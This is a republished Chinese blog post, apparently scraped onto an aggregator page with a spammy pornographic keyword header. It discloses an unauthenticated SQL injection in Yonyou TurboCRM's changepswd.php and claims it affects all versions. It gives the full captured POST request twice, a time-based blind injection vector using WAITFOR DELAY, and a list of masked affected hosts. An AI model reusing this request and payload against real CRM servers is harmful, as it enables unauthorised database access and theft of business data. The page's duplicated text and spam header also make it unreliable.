日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程语言 > php >内容正文

php

用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)

發(fā)布時間:2025/3/15 php 18 豆豆
生活随笔 收集整理的這篇文章主要介紹了 用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下圖找到找回密碼頁

訪問http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

輸入信息抓包

POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1

Host: **.**.**.**:8081

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

Content-Length: 95

Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cachesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1

1

2

3

4

5

6

7

8

9

10

11

12

13

14

POST/login/changepswd.php?orgcode=1&loginname=systemHTTP/1.1

Host:**.**.**.**:8081

User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64;rv:32.0)Gecko/20100101Firefox/32.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding:gzip,deflate

X-Requested-With:XMLHttpRequest

Content-Type:application/x-www-form-urlencoded;charset=UTF-8

Referer:http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system

Content-Length:95

Cookie:PHPSESSID=8a4jg4pb034v5dcbachfllljd1

Connection:keep-alive

Pragma:no-cache

Cache-Control:no-cachesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1

算法:Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--影響**.**.**.****.**.**.****.**.**.****.**.**.**http://**.**.**.**:8888**.**.**.****.**.**.**:9091**.**.**.**:9091**.**.**.**:8081**.**.**.**:8088**.**.**.****.**.**.**:8001**.**.**.****.**.**.****.**.**.****.**.**.****.**.**.**:8088**.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.****.**.**.**:8080**.**.**.**:9036**.**.**.**:8080**.**.**.****.**.**.****.**.**.**:8088**.**.**.**:8080**.**.**.**:8080**.**.**.**:9000**.**.**.****.**.**.**:8088**.**.**.**:8080

總結(jié)

以上是生活随笔為你收集整理的用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。